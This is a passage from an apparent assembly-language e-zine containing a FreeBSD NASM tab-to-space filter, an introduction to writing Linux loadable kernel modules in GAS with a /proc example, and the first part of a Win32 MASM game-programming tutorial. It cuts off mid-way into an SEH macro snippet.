mcopy szFatalCaption, szCaption
.endif
invoke MessageBox, NULL, addr szFatalMessage, addr szFatalCaption,
MB_ICONHAND or MB_SYSTEMMODAL
;// End process and all its threads.
invoke ExitProcess, eax
AppFatalExit endp
end start
---------------------------------------------------------------------------8<--
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
System Calls in FreeBSD
by G. Adam Stanislav
Assembly language programing under Unix is highly undocumented. It is
generally
assumed that no one would ever want to use it because various Unix systems
run
on different microprocessors, so everything should be written in C for
portability.
Now, we know that C portability is a myth. Even C programs need to be
modified
when ported from one Unix to another, regardless of what processor each runs
on.
I was pleasantly surprised when one of FreeBSD hackers recently posted an
assembly language 'Hello, World' program on the web. See
http://home.ptd.net/~tms2/hello.html for what he has to say.
There were two things I did not like in his example:
First of all, he uses the GNU assembler with its AT&T syntax. Talk about
lack
of portability! Ever since I got involved in Unix programming, I switched
from
MASM to NASM and never looked back. NASM allows me to use the same code for
Windows and Unix with only minor modifications needed wherever system calls
are
necessary. Everything else remains the same. I also like the fact I can use
dots in the middle of a label.
Secondly, he uses a separate procedure for the system call. It looks like
this
(in AT&T syntax):
do_syscall:
int $0x80 # Call kernel.
ret
He says a direct use of int 80h would not work. I refused to believe it.
And I
was right. The "problem" he is solving by using a separate procedure is the
fact that int 80h is optimized for the use with C programs which make calls
to
functions like write() and read(). Because they make a call, an extra DWORD
is
pushed on the stack before invoking int 80h.
His solution works, of course, but is unnecessary. All that is needed is
pushing an extra DWORD before invoking int 80h. The value pushed is
irrelevant.
In my modification to his code, I simply pushed EAX and invoked int 80h.
Then I
added an extra four bytes to ESP. I already had to increase it anyway
because
int 80h uses C calling convention of receiving parameters on the stack and
leaving them there. It worked without a hitch.
I learned from his code that the value in EAX determines which system call
int
80h makes. A list of these can be found in the C include file
<sys/syscall.h>.
I then decided to experiment with his code a bit further, and create
something
that actually does some work.
A typical Unix program is a filter which reads its input from stdin, writes
its
output to stdout, and sends error messages to stderr. I decided to produce
such
a filter for this article. Because I used tabs in my source code and needed
to
convert them to spaces for this article, I made the filter convert tabs to
spaces. Because I started writing it under Windows and finished it under
Unix,
I also made the filter strip any carriage returns.
It would be more useful if it could accept command line parameters, so you
could decide how many spaces a tab should expand to. Alas, I have no idea
where
to find the command line under FreeBSD. If you know, please email me at
adam@.... For now, the program simply assumes a tab stop is at
every 8th position.
The program uses ESI as a counter of where on the line it is. To calculate
the
number of blanks to insert, it moves ESI to EAX, negates EAX, ands it with
seven, and adds 1. This works very well. Suppose you are at the beginning of
the line, i.e., at the first position. So, you turn 1 into -1, i.e.,
0FFFFFFFFh. And it with 7, you get 7. Increase that, and you know you need
to
write 8 spaces.
I also used EDI as the pointer to the read/write buffer. I could have just
pushed its offset (push dword buffer) every time, but pushing a register
produces less code and is probably faster.
I chose ESI and EDI to hold persistent values (i.e., values that need to
survive the system call) because Unix system software uses the C convention
of
preserving these two registers (as well as EBX and EBP).
In my first version I started the program with a PUSHAD and ended it a
POPAD.
This is certainly needed in Windows programs: An assembly language program
will
crash Windows if it returns to Windows with any of the four aforementioned
registers modified.
Then I thought that surely FreeBSD would not allow such a serious security
hole
in the system. I removed the PUSHAD and the POPAD, and the program worked
without a hitch.
The result is below.
;---------------------------------------------------------------------------
; File: tab2sp.asm
;
; A sample assembly language program for FreeBSD.
; It converts tabs to spaces. Nothing new, expand
; already does that and with more options.
;
; But it illustrates reading from stdin, and writing
; to stdout and stderr in assembly language.
;
; 05-May-2000
; Copyright 2000 G. Adam Stanislav
; All rights reserved
;
; http://www.whizkidtech.net/
; http://www.redprince.net/
;
; Assemble with nasm:
;
; nasm -f tab2sp.asm
; ld -o tab2sp tab2sp.o
section .data
buffer times 8 db ' '
errread db 'TAB2SP: Error reading input', 0Ah
erlen equ $-errread
align 4, db 0
errwrite db 'TAB2SP: Error writing output', 0Ah
ewlen equ $-errwrite
section .code
; ld expects every program to start with _start
global _start
_start:
; We use EDI and ESI to store persistent data
; because syscall will not modify them.
mov edi, buffer ; EDI = address of buffer
sub esi, esi ; ESI = counter
; NOTE:
;
; Because int 80h expects to be within a separate
; procedure, we need to push a fake return address
; before invoking it. It can be anything, so we
; just push EAX.
.read:
sub eax, eax
inc al
push eax ; size of "string"
push edi ; address of buffer
dec al
push eax ; stdin = 0
push eax ; "return address"
mov al, 3 ; SYS_read
int 80h ; syscall
add esp, byte 16 ; clean the stack after reading
or eax, eax
je .quit ; end of file reached
js .rerror ; read error...
; Decide what to do:
;
; If the byte is a carriage return, ignore it.
; If the byte is a newline, initialize ESI = 0.
; If the byte is a tab, convert it to spaces.
; Otherwise, just write it.
mov dl, [edi]
cmp dl, 0Dh ; carriage return
je .read
cmp dl, 0Ah ; new line
je .newline
inc esi
cmp dl, 09h ; tab
jne .write
; It's a tab. Expand it.
mov byte [edi], ' '
mov eax, esi
neg eax
and eax, 7
add esi, eax
inc eax
jmp short .write
.newline:
sub esi, esi
.write:
push eax ; size of "string"
push edi ; address of buffer
sub eax, eax
inc al
push eax ; stdout = 1
push eax ; "return address"
mov al, 4 ; SYS_write
int 80h ; system call
add esp, byte 16
or eax, eax
jns short .read
push dword ewlen
push dword errwrite
jmp short .err
.rerror:
push dword erlen
push dword errread
.err:
sub eax, eax
mov al, 2 ; stderr = 2
push eax
push eax ; "return address"
add al, al ; SYS_write
int 80h
add esp, byte 16
.quit:
sub eax, eax ; EAX = 0
push eax ; exit status
inc eax ; SYS_exit
push eax ; "return address"
int 80h
; Program ends here.
;--------------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Loadable Kernel
Modules
by mammon_
If there is one area in linux that is sure to attract assembly language
coders,
it is the coding of loadable kernel modules; after all, asm programmers
aren't
known for waiting around in Ring 3 space waiting for the CPU to assign their
process some resources.
Kernel modules are Ring 0 programs that are dynamically linked into a
running
kernel; they require LKM support in the kernel [ CONFIG_MODULES ]. Each
kernel
ships with a given number of kernel modules, as most device drivers are
compiled as such; the modules are located in /lib/modules/kernel_version#.
Modules are managed with the commands insmod [load module], modprobe [load
module and all modules it depends on], lsmod [list loaded modules], and
rmmod
[unload module]; information on loaded modules can also be obtained from the
/proc file system, e.g. /proc/modules.
Kernel Land
-----------
It need hardly be said that kernel-space programming is different from
user-space progamming. For starters, simple bugs can panic the kernel, or
render kernel subsystems unreliable if not actually inoperable. It is
advisable, when developing kernel modules, to become well-acquainted with
the
"Magic SysReq Key" commands.
There is no main function. Kernel modules must export the init_module and
cleanup_module routines; these will be called by the kernel when the module
is
loaded and unloaded. The rest of the kernel module will generally consist of
callback routines which are executed in response to system events [i.e.
ioctl()
calls, reading of /proc files, syscalls, interrupts].
The standard C libraries are also unavailable -- they are far away, in the
user-space shared by all normal, well-behaved programs. The only external
routines that a kernel module can call are those listed in the kernel symbol
table [which can be browsed via /proc/ksyms] and the INT 80 syscalls. Some
basic C-style routines are provided by the kernel, and are prototyped in
$INCLUDE/linux/kernel.h:
simple_strtol(const char *,char **,unsigned int);
sprintf(char * buf, const char * fmt, ...);
vsprintf(char *buf, const char *, va_list);
get_option(char **str, int *pint);
memparse(char *ptr, char **retptr);
printk(const char * fmt, ...)
Note that the standard kernel routines are documented in section 9 of the
manual, and can be browsed with
ls -1 /usr/man/man9 | cut -d. -f1
As mentioned in a previous article, the syscalls are listed in
/usr/include/asm/unistd.h .
Finally, accessing user-space memory is not easy. In C, there are macros
provided for this -- get_user(), put_user(), copy_from_user(),
copy_to_user()
... all defined in $INCLUDE/asm/uaccess.h -- and these boil down to inline
assembler routines that can be accessed, somewhat awkwardly, from routines
listed in the kernel symbol table [e.g. __get_user_1 and so on]. In general,
it
is best to leave user/kernel-space interaction to /proc and /dev files.
Developing Kernel Modules
-------------------------
What does all of this mean in terms of assembly language? Essentially, asm
kernel modules will have the same problems as C kernel modules, with the
added
bonus that none of the C macros for kernel-mode programming will work.
When programming kernel modules, one is more or less restricted to using the
GAS assembler. NASM can be made to work, but by default it produces object
files in format that the kernel module loader cannot recognize [note:
RedPlait
has produced a patch for NASM to fix this; in addition, it is possible to
write a libBFD post-processor which will re-assemble the sections in the
appropriate order]. Information on GAS invocation and syntax can be obtained
from the 'as' manpage and info file, and the GAS preprocessor is documented
in the 'gasp' info page. Note that the info files can be accessed randomly
by
appending the sequence of menu selections to the command; thus
info as Machine i386 i386-Syntax
would load the 'as' info section for i386 syntax details.
Kernel modules are unlinked object files -- they are linked to the kernel
dynamically, and so should not be run through ld. Using gcc, a kernel module
can be compiled with
gcc -c filename
assuming that the file extension is .s or .S . Gcc will produce a .o output
file which may be loaded using 'insmod' and unloaded using 'rmmod'. The
compilation/test cycle for a linux kernel module is essentially
gcc -c asm_module.s
insmod asm_module
lsmod
rmmod asm_module
Note that modules which cannot be initialized or unloaded will remain loaded
until reboot, thus preventing another module with the same name from being
loaded. In order to minimize reboots, it helps to symlink a number of 'test'
filenames to the original object file, so that 'asm_module.o' would be
linked
to 'asm_module1.o', 'asm_module2.o', and so on.
Debugging kernel modules can be quite a chore. While kernel-mode debuggers
exist for linux, it is often more expedient to use primitive "printf"
debugging
techniques and core file analysis. In the former case, the linux kernel
provides the function "printk()", which is the kernel-mode equivalent of
printf(); the one notable difference is that the format string should begin
with a 'priority code' indicating how syslogs should handle the message. The
priority codes are:
<0> Kernel Emergency
<1> Kernel Alert
<2> Kernel Critical Condition
<3> Kernel Error
<4> Kernel Warning
<5> Kernel Notice
<6> Kernel Info
<7> Kernel Debug
In addition, when a kernel module 'crashes', it writes an 'oops' file to
STDERR. This is essentially a stripped-down core file giving the registers
and stack state at the moment of the crash; it can be saved to a file and
loaded with the ksymoops utility to make the report more coherent.
One of the best tools for debugging assembly language kernel modules is gcc
itself. If the module --or the problematic portion thereof-- can be written
correctly in C, a GAS version can be produced by compiling the module with
gcc -S filename
This will produce an assembly-language version of the program, loaded with
GAS preprocessor directives. This file can be cleaned up and compared
against
the hand-tooled assembly language version in order to judge the effects of
C macros, data alignment, and sections.
Hello Kernel
------------
As usual, it is best to start with the most simple module possible in order
to
demonstrate the absolute basics of LKM programming. Other than the use of
init
and cleanup functions, this module should not present any surprises:
#---------------------------------------------------------------------Asm_mod.s
.globl init_module
.globl cleanup_module
.extern printk
.text
.align 4
init_module:
pushl $strLoad
call printk
popl %eax
xor %eax, %eax
ret
cleanup_module:
pushl $strUnload
call printk
popl %eax
xorl %eax, %eax
ret
.section .rodata
.align 32
strLoad:
.ascii "<1> Asm Module Loaded!\n\0"
strUnload:
.ascii "<1> Asm Module Unloaded\n\0"
.section .modinfo
__module_lernel_version:
.ascii "kernel_version=2.2.15\0"
#---------------------------------------------------------------------------EOF
As you can see, this program does nothing special -- it simply outputs an
alert when the module is loaded or unloaded. Note the .modinfo section of
the
program; this is where the module specifies which kernel it was compiled
for.
In C, a macro determines this based on a constant in the kernel header
files;
in assembly, you will have to specify the kernel version by hand or with a
Makefile. Also note the .rodata section -- this is where the kernel expects
to
find string references, and one can expect a lot of segmentation faults if
the
strings are placed in .data instead.
Using the /proc Filesystem
--------------------------
The trend in linux, as well as in other Unixes, is to provide runtime access
to
kernel-space data through the /proc file system. Linux system tweakers will
no
doubt be familiar with cat'ing /proc files to check the status of kernel
variables, and echo'ing values to those files in order to change the values
of
such variables. The /proc filesystem is a handy mechanism for interfacing
with
kernel modules without the relative complexity of a device file and an
ioctl()
interface.
Creating an entry in the /proc file system consists of the following steps:
1. Prepare a proc_dir_entry struct to describe the /proc file
2. Register the /proc file to create it
3. Unregister the /proc file when finished with it
The most important component of this process is obviously the proc_dir_entry
structure; it is define in $INCLUDE/linux/proc_fs.h:
struct proc_dir_entry {
unsigned short low_ino; //inode # of the
/proc file
unsigned short namelen; //length of filename
const char *name; //pointer to filename
string
mode_t mode; //Access mode
[permissions]
nlink_t nlink; //# of links to the
file
uid_t uid; //UID of file owner
gid_t gid; //GID of file owner
unsigned long size; //Size of the file
struct inode_operations * proc_iops;
struct file_operations * proc_fops;
get_info_t *get_info; //Function handling file
reads
struct module *owner;
struct proc_dir_entry *next, *parent, *subdir;
void *data; //pointer to
'user-defined' data
read_proc_t *read_proc;
write_proc_t *write_proc;
unsigned int count; /* use count */
int deleted; /* delete flag */
kdev_t rdev;
};
The last 5 members of the structure are not defined in the proc_dir_entry
man
page, and do not appear to be used; however, as demonstrated in the sample
code, space must be reserved for them.
In most cases, the majority of these structure members cal be set to NULL in
order to have them filled with default values. The members that should
normally
be set to null include low_ino, uid, gid, size, *proc_iops, *proc_fops,
*owner,
*next, *parent, *subdir, and *data. This leaves the following members to be
filled by the program:
namelen -- length of *name string, without the terminating \0
*name -- .rodata string containing the name of the /proc file
mode -- access permissions for the file
nlink -- 1 for normal files, 2 for directories
*getinfo -- callback routine for reads to the /proc file
Note that *getinfo() is called for normal /proc file reads, e.g. `cat
\proc\modules`. In order to handle more advanced operations such as writes,
links, and so forth, an inodes_operations and a file_operations structure
need
to set up.
The *getinfo() function has the following prototype:
int get_info(char *buffer, char **retBuf, off_t pos, int size);
where buffer is the buffer provided by the user-space program, size is the
size of that buffer, pos is the current position in the file [to support
multiple, sequential reads by the user-space program], and retBuf is a
pointer
to a buffer which can be used in place of the supplied buffer [for example,
if
size is too small]. When a return buffer is used, a pointer to the buffer is
stored in retBuf, and the size of the buffer is returned in eax.
It is important to use stack frames in all kernel-mode callbacks. The
prototype
for a get_info function in GAS would be
.globl get_info
get_info:
pushl %ebp
movl %esp,%ebp
....
movl %eax,20(%ebp)
leave
ret
The parameters will all be at offsets of %ebp, as the default return value
[an
invisible fifth parameter that is always zero] demonstrates.
Registering and unregistering a proc file are fairly straightforward. The
proc_register command has the prototype
proc_register(proc_dir_entry *parent, proc_dir_entry *child)
and always returns 0. The *parent structure must refer to a directory within
the /proc tree; the global symbols proc_root and proc_sys_root refer to the
directories /proc and /proc/sys, respectively. The child structure refers to
the /proc entry that is being created.
The proc_unregister command has the prototype
proc_unregister(proc_dir_entry * parent, int inode);
and returns 0 only on success. The parent node will be the same as in the
proc_register call, while inode refers to the inode assigned to the /proc
file
being unregistered. Note that the inode of a /proc file is specified in the
first member of the proc_dir_entry structure; if the inode member is 0 on
/proc
file registration, an inode number is dynamically assigned and stored in the
inode member.
Hello Proc
----------
The following program will demonstrate the use of the get_info() function;
it
creates a /proc file which, when read, will return a simple string in the
buffer provided by the user-space program.
#--------------------------------------------------------------------Asm_proc.s
.globl init_module
.globl cleanup_module
.globl ReadAsmProcFile
.globl procAsm
.extern printk
.extern sprintf
.extern proc_root
.extern proc_register
.extern proc_unregister
.text
.align 4
init_module:
pushl %ebp
movl %esp,%ebp
pushl $strLoad
call printk
popl %eax
pushl $procAsm
pushl $proc_root
call proc_register
addl $0x8, %esp
xorl %eax, %eax
leave
ret
cleanup_module:
pushl %ebp
movl %esp,%ebp
pushl $strUnload
call printk
popl %eax
movzwl procAsm, %eax
pushl %eax
pushl $proc_root
call proc_unregister
addl $0x8, %esp
xorl %eax, %eax
leave
ret
ReadAsmProcFile:
pushl %ebp
movl %esp,%ebp
pushl $strRead
movl 8(%ebp),%eax
pushl %eax
call sprintf
addl $16,%esp
movl %eax,20(%ebp)
leave
ret
.section .modinfo
__module_kernel_version:
.ascii "kernel_version=2.2.15\0"
.section .rodata
.align 32
strName: .ascii "AsmModule\0"
strLoad: .ascii "<1> Asm Module Loaded!\n\0"
strUnload: .ascii "<1> Asm Module Unloaded\n\0"
strRead: .ascii "This /proc file has nothing to say\n\0"
.data
.align 32
#______________________File_Permissions
.equ S_IFREG, 0100000
.equ S_IRUSR, 00400
.equ S_IWUSR, 00200
.equ S_IXUSR, 00100
.equ S_IRGRP, 00040
.equ S_IWGRP, 00020
.equ S_IXGRP, 00010
.equ S_IROTH, 00004
.equ S_IWOTH, 00002
.equ S_IXOTH, 00001
#________________________________________proc_dir_entry structure
procAsm:
procAsm_low_ino: .short 0
procAsm_name_length: .short 9
procAsm_name: .long strName
procAsm_mode: .short S_IFREG | S_IRUSR |S_IRGRP |
S_IROTH
procAsm_nlinks: .short 1
procAsm_owner: .short 0
procAsm_group: .short 0
procAsm_size: .long 0
procAsm_operations: .long 0
procAsm_read_proc: .long ReadAsmProcFile
.zero 40
#________________________________________end proc_dir_entry
#---------------------------------------------------------------------------EOF
The /proc file can be read with the usual `cat /proc/AsmModule` commands. It
should be noted that get_info() is executed when the file is opened; this
allows different behavior to be supplied for file opens, reads, and writes.
Further Reading
---------------
Programming Linux kernel modules, either in assembly or in C, is a
complicated
and challenging field. The following online resources provide vital
information
on kernel module programming.
"Linux Kernel Module Programming Guide", by Ori Pomerantz
http://www.linuxdoc.org/LDP/lkmpg/mpg.html
The 'classic' guide to LKM programming. This work is part of the
Linux
documentation project, and is available in most Linux distributions.
Most LKM texts will assume you are familiar with the concepts
presented
in this one.
"(nearly) Complete Linux Loadable Kernel Modules", by pragmatic / THC
http://thc.pimmel.com/files/thc/LKM_HACKING.html
Based on the exploratory LKM hacking essays of Phrack 50 and 52,
this treatise on LKM hacking is very thorough and very informative.
The text contains an introduction to LKM programming and proceeds to
cover kernel modules from the security and hacking viewpoints, with
plenty of source code to back up the discussion. If you read or print
out only one LKM guide, this should be it.
"Linux Kernel Hacker Documentation"
http://jungla.dit.upm.es/~jmseyas/linux/kernel/hackers-docs.html
This page contains links to a number of articles and books on Linux
kernel-mode programming.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
Win32 ASM Game Programming -
Part 1
by Chris Hobbs
[This series of articles was first posted at GameDev.net and is now
being
published here with the author's permission. Here is Chris Hobbs'
introduction
on this particular article:
"A tutorial series on the development of a complete game, SPACE-TRIS, in
pure
ASM. This one covers the design document, code framework, and some Win32
ASM
basics."
Visit his website at http://www.fastsoftware.com.
Preface, Html-to-Txt conversion and formating by Chili ]
This is the article that I am sure all of you have been waiting ever so
patiently for ... a complete series on the development of a game, in pure
Assembly Language of all things. I know all of you are as excited about this
article as I am, so I will try and keep this introduction brief. Instead of
laying every single thing out to you in black and white, I will try and
answer
a few questions that are asked most often, and the details will appear as we
progress ( I am making this up as I go you know ).
What is this article about?
---------------------------
This article is actually part of a seven article series on the development
of a
complete game, SPACE-TRIS, in 100% assembly language. We will be covering
any
aspect of game development that I can think of ... from design and code
framework to graphics and sound.
Who is this article for?
------------------------
This series is meant for anybody who wishes to learn something that they may
not have known before. Since the game is a relatively simple Tetris clone it
is
great for the beginner. Also, given the fact that not many people are even
aware that it is completely possible to write for Windows in assembly
language,
it is great for the more advanced developers out there too.
What do I need?
---------------
The only requirement is the ability to read. However, if you wish to
assemble
the source code, or participate in the challenge at the end of the article
series, you need a copy of MASM 6.12+. You can download a package called
MASM32
that will have everything that you need, and then some. Here is the link:
http://www.pbq.com.au/home/hutch/.
Why Assembly Language?
----------------------
Many of you are probably wondering why anybody in their right mind would
write
in pure assembly language. Especially in the present, when optimizing
compilers
are the "in" thing and everybody knows that VC++ is bug free, right? Okay I
think I answered that argument ... but what about assembly language being
hard
to read, non-portable, and extremely difficult to learn. In the days of DOS
these arguments were very valid ones. In Windows though, they are simply
myths
left over from the good old days of DOS. I might as well approach these one
at
a time.
First, assembly language is hard to read. But for that matter so is C, or
even
VB. The readability results from the skill of the programmer and his/her
thoroughness at commenting the code. This is especially true of C++. Which
is
easier to read: Assembly code which progress one step at a time ( e.g. move
variable into a register, move a different variable into another register,
multiply ), or C++ code which can go through multiple layers of Virtual
Functions that were inherited? No matter what language you are in,
commenting
is essential ... use it and you won't have any troubles reading source code.
Remember just because you know what it means doesn't mean that everybody
else
does also.
Second, the issue of portability. Granted assembly language is not portable
to
other platforms. There is a way around this, which allows you to write for
any
x86 platform, but that is way beyond the scope of this article series. A
good
80-90% of the games written are for Windows. This means that the majority of
your code is specific to DirectX or the Win32 API, therefore ... you won't
be
porting without a huge amount of work anyway. So, if you want a truly
portable
game, then don't bother with writing for DirectX at all ... go get a
multi-platform development library.
Finally, there comes the issue of Assembly Language being extremely
difficult
to learn. Although there is no real way for me to prove to you that it is
easy,
I can offer you the basics, in a few pages, which have helped many people,
who
never saw a line of assembly language before, learn it. Writing Windows
assembly code, especially with MASM, is very easy. It is almost like writing
some C code. Give it a chance and I am certain that you won't be
disappointed.
Win32 ASM Basics
----------------
If you are already familiar with assembly language in the windows platform,
you
may want to skip this section. For those of you who aren't, this may be a
bit
boring, but hang with it ... this is very important stuff. For this
discussion
I will presume that you are at least familiar with the x86 architecture.
The first thing you need to understand are the instructions. There aren't
very
many that you will be using often so I will simply cover the ones that we
care
about.
MOV
---
This instruction moves a value from one location to another. You can only
move
from a register to register, memory to register, or register to memory. You
can
not move from a memory location to another memory location.
Example:
MOV EAX, 30
MOV EBX, EAX
MOV my_var1, EAX
MOV DWORD PTR my_var, EAX
The first example moves the value 30 into the EAX register. The second
example
moves the value in EAX into the EBX register. The third example moves the
value
of EAX into the variable my_var1. The fourth example moves the value of EAX
into the ADDRESS pointed to by my_var, we need to use the DWORD specifier so
that the assembler knows how much memory to move -- 1 byte ( BYTE ), 2 bytes
( WORD ), or 4 bytes ( DWORD ).
ADD & SUB
---------
These two instructions perform addition and subtraction.
Example:
ADD EAX, 30
SUB EBX, EAX
The examples simply add 30 to the EAX register and then subtract that value
from the EBX register.
MUL & DIV
---------
These two instructions perform multiplication and division.
Example:
MOV EAX, 10
MOV ECX, 30
MUL ECX
XOR EDX, EDX
MOV ECX, 10
DIV ECX
The examples above first load EAX with 10 and ECX with 30. EAX is always the
default multiplicand, and you get to select the other multiplier. When
performing a multiplication the answer is in EAX:EDX. It only goes into EDX
if
the value is larger than the EAX register. When performing a divide you must
first clear the EDX register that is what the XOR instruction does by
performing an Exclusive OR on itself. After the divide, the answer is in
EAX,
with the remainder in EDX, if any exists.
Of course, there are many more instructions, but those should be enough to
get
you started. We will probably only be using a few others, but they fairly
easy
to figure out once you have seen the main ones. Now we need to deal with the
calling convention. We will be using the Standard Call calling convention
since
that is what the Win32 API uses. What this means is that we push parameters
onto the stack in right to left order, but we aren't responsible for the
clearing the stack afterwards. Everything will be completely transparent to
you
however as we will be using the pseudo-op INVOKE to make our calls.
Next, there is the issue of calling Windows functions. In order to use
invoke,
you must have a function prototype. There is a program that comes with
MASM32
which builds include files ( equivalent to header files in C ) out of the
VC++
libraries. Then, you include the needed libraries in your code and you are
free
to make calls as you wish. You do have to build a special include file by
hand
for access to Win32 structures and constants. However, this too is included
in
the MASM32 package, and I have even put together a special one for game
programmers which will be included in the source code and built upon as
needed.
The final thing that I need to inform you about is the high level syntax
that
MASM provides. These are constructs that allow you to create If-Then-Else
and
For loops in assembly with C-like expressions. They are easiest to show once
we
have some code to put in, therefore you won't see them until next time. But,
they are there ... and they make life 100000 times easier than without them.
That is really about all you need to know. The rest will come together as we
take a look at the source code and such. So, now that we have that out of
the
way, we can work on designing the game and creating a code framework for it.
The Design Document
-------------------
Time for something a lot more fun ... designing the game. This is a process
that is often neglected simply because people want to start writing code as
soon as they have an idea. Although this approach can work for some people,
it
often does not. Or, if it does work, you end up re-coding a good portion of
your game because of a simple oversight. So, we will cover exactly how to
create a design document that you will be able to stick to, and will end up
helping you with your game.
First, you need to have an idea of what you want the game to be, and how you
want the game play. In our case this is a simple Tetris clone so there isn't
too much we need to cover in the way of game play and such. In many cases
though, you will need to describe the game play as thoroughly as possible.
This
will help you see if your ideas are feasible, or if you are neglecting
something.
The easy part is finished, now we need to come up with as many details as we
possibly can. Are we going to have a scoring system? Are we going to have
load/save game options? How many levels are there? What happens at the end
of a
level? Is there an introductory screen? These are the kinds of questions
that
you should be asking yourself as you work on the design of the game. Another
thing that may help you is to story board or flow chart the game on a piece
of
paper or your computer. This will allow you to see how the game is going to
progress at each point.
Once you have all of the details complete, it is time to start sketching the
levels out. How do you want the screens to appear? What will the interfaces
look like? This doesn't have to be precise just yet ... but it should give
you
a realistic idea of what the final versions will look like. I tend to break
out
my calculator and estimate positions at this point also. I have actually ran
out of room while creating the menu screen before. This was my own fault for
not calculating the largest size my text could be and it took a few hours to
re-do everything. Don't make the same mistake, plan ahead.
The final stage is just sort of a clean-up phase. I like to go back and make
sure that everything is the way I want it to be. Take a few days break from
your game beforehand. This will give you a fresh viewpoint when you come
back
to it later on. Often times, you will stare at the document for so long that
something extraordinarily simple will be glanced over and not included in
your
plan -- for instance, how many points everything is worth and the maximum
number of points they can get ( Not that I have ever found out halfway
through
the game that the player could obtain more points than the maximum score
allowed for, or anything like that ).
Whether you choose to use the process I have outlined, or one of your own
making, it is imperative that you complete this step. I have never been one
for
wasted effort -- I do it right the first time if possible, and learn from my
mistakes, as well as the mistakes of others. If this weren't necessary I
wouldn't do it. So, do yourself a favor and complete a design document no
matter how simple you think your game is.
The final preparation step is something that I like to call code framework.
This is where you lay out your blank source code modules and fill them with
comments detailing the routines that will go into them and the basic idea
behind how they operate. If you think you are perfect and have gotten every
detail in your design document then you can probably skip this step. But,
for
those of you like me, who are cautious, then give this phase a whirl. It
helps
you see how all of the pieces will fit together and more importantly if
something has been neglected or included that shouldn't have been.
Here is an example of the framework that I am speaking about from
SPACE-TRIS.
You can see that nothing much goes into it ... just an overview of the
module
more or less.
;###########################################################################
; ABOUT SPACE-TRIS:
;
; This is the main portion of code. It has WinMain and performs all
; of the management for the game.
;
; - WinMain()
; - WndProc()
; - Main_Loop()
; - Game_Init()
; - Game_Main()
; - Game_Shutdown()
;
;
;###########################################################################
;###########################################################################
; THE COMPILER OPTIONS
;###########################################################################
.386
.MODEL flat, stdcall
OPTION CASEMAP :none ; case sensitive
;###########################################################################
; THE INCLUDES SECTION
;###########################################################################
;==================================================
; This is the include file for the Windows structs,
; unions, and constants
;==================================================
INCLUDE Includes\Windows.inc
;================================================
; These are the Include files for Window calls
;================================================
INCLUDE \masm32\include\comctl32.inc
INCLUDE \masm32\include\comdlg32.inc
INCLUDE \masm32\include\shell32.inc
INCLUDE \masm32\include\user32.inc
INCLUDE \masm32\include\kernel32.inc
INCLUDE \masm32\include\gdi32.inc
;====================================
; The Direct Draw include file
;====================================
INCLUDE Includes\DDraw.inc
;===============================================
; The Lib's for those included files
;================================================
INCLUDELIB \masm32\lib\comctl32.lib
INCLUDELIB \masm32\lib\comdlg32.lib
INCLUDELIB \masm32\lib\shell32.lib
INCLUDELIB \masm32\lib\gdi32.lib
INCLUDELIB \masm32\lib\user32.lib
INCLUDELIB \masm32\lib\kernel32.lib
;=================================================
; Include the file that has our prototypes
;=================================================
INCLUDE Protos.inc
;###########################################################################
; LOCAL MACROS
;###########################################################################
szText MACRO Name, Text:VARARG
LOCAL lbl
JMP lbl
Name DB Text,0
lbl:
ENDM
m2m MACRO M1, M2
PUSH M2
POP M1
ENDM
return MACRO arg
MOV EAX, arg
RET
ENDM
RGB MACRO red, green, blue
XOR EAX,EAX
MOV AH,blue
SHL EAX,8
MOV AH,green
MOV AL,red
ENDM
hWrite MACRO handle, buffer, size
MOV EDI, handle
ADD EDI, Dest_index
MOV ECX, 0
MOV CX, size
ADD Dest_index, ECX
MOV ESI, buffer
movsb
ENDM
hRead MACRO handle, buffer, size
MOV EDI, handle
ADD EDI, Spot
MOV ECX, 0
MOV CX, size
ADD Spot, ECX
MOV ESI, buffer
movsb
ENDM
;##############################################################################
; Variables we want to use in other modules
;##############################################################################
;##############################################################################
; External variables
;##############################################################################
;##############################################################################
; BEGIN INITIALIZED DATA
;##############################################################################
.DATA
;##############################################################################
; BEGIN CONSTANTS
;##############################################################################
;##############################################################################
; BEGIN EQUATES
;##############################################################################
;=================
;Utility Equates
;=================
FALSE EQU 0
TRUE EQU 1
;##############################################################################
; BEGIN THE CODE SECTION
;##############################################################################
.CODE
start:
;########################################################################
; WinMain Function
;########################################################################
;########################################################################
; End of WinMain Procedure
;########################################################################
;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################
;########################################################################
; End of Main Windows Callback Procedure
;########################################################################
;========================================================================
; THE GAME PROCEDURES
;========================================================================
;########################################################################
; Game_Init Procedure
;########################################################################
;########################################################################
; END Game_Init
;########################################################################
;########################################################################
; Game_Main Procedure
;########################################################################
;########################################################################
; END Game_Main
;########################################################################
;########################################################################
; Game_Shutdown Procedure
;########################################################################
;########################################################################
; END Game_Shutdown
;########################################################################
;######################################
; THIS IS THE END OF THE PROGRAM CODE #
;######################################
END start
Well, this is the end of the first article. The good news is all of the dry
boring stuff is behind us. The bad news is you won't get to see any code
until
I complete the next article. In the meantime I would suggest brushing up on
your assembly language and maybe searching on the Internet for some
references
on Win32 assembly language. You can find links to a lot of Win32 ASM
resources
at my website:
http://www.fastsoftware.com.
Researching more information isn't a must ... but for those of you that
still
think this might be difficult, I would suggest taking the time to do so. It
isn't like you will be hindered by learning more. You may find another
resource
that helps you learn this stuff and that is ALWAYS a good thing.
In the next article we will get a skeleton version of SPACE-TRIS up and
running
along with coding our Direct Draw library functions. The goal is to get a
bitmap up onto the screen and I think we can accomplish it next time. If
everything goes as planned, you should see the work starting to pay off in a
loading game screen. I know it doesn't sound like much ... but appreciate
how
slowly we are progressing before we get further along. Because once we have
the
basics down, we are going to pull out all of the stops and then you will be
thankful we took the extra time to cover this stuff.
So young grasshoppers, until next time ... happy coding.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
SEH.INC
by
X-Calibre
;Summary: Macros for Structured Exception Handling
;Compatibility: MASM, Win32
;Notes: Demonstration code contained in SEH.ASM, below
IFNDEF RaiseException
